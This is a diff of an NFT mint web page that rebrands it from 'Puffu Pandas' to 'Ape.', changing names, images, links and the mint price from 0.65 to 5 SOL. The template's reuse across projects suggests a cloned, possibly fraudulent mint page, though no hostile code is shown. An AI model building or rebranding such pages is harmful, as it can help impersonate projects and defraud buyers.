--- a/index.html
+++ b/index.html
@@ -4,18 +4,18 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 puffupandas.io/mint" property="og:title">
+    <meta content="🌐 justape.co/mint" property="og:title">
     <meta content="
-      🟢 Puffu Pandas Minting is NOW LIVE!
+      🟢 Ape. Minting is NOW LIVE!
     
-      Mint Price: 0.65 SOL
+      Mint Price: 5 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1513263198413197315/1651686575/1500x500" property="og:image">
+    <meta content="https://pbs.twimg.com/media/FTS9g3eWUAErHkx?format=jpg&name=4096x4096" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/142" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/143" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Puffu Pandas</title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1521986402765922308/kKQx8QTq_400x400.jpg" />
+    <title>Ape.</title>
+    <link rel="shortcut icon" href="https://www.justape.co/favicon.ico" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -54,12 +54,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Puffu Pandas</h2>
+                <h2 class="right-title">Ape.</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            3333 Puffu Pandas on #Solana a hybrid mint through $DUST and SOL, Proud @DegodsNFT holder building for the #DeGods and #Solana ecosystem. Based out of Toronto.
+                            Just ape. A collection of 10,000 Apes that take us back to basics. None of the fluff, all of the value.
                     </li>
                     </div>
 
@@ -70,7 +70,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>0.65</span> SOL</div>
+                            <div id="price-total"><span>5</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -91,7 +91,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://cdn.discordapp.com/attachments/966052113908117517/966306156215685210/image_2.png" alt="GiF">
+                        <img class="animation" src="https://www.justape.co/images/ape_example.png" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -107,7 +107,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 0.65;
+        let itemPriceSelected = 5;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
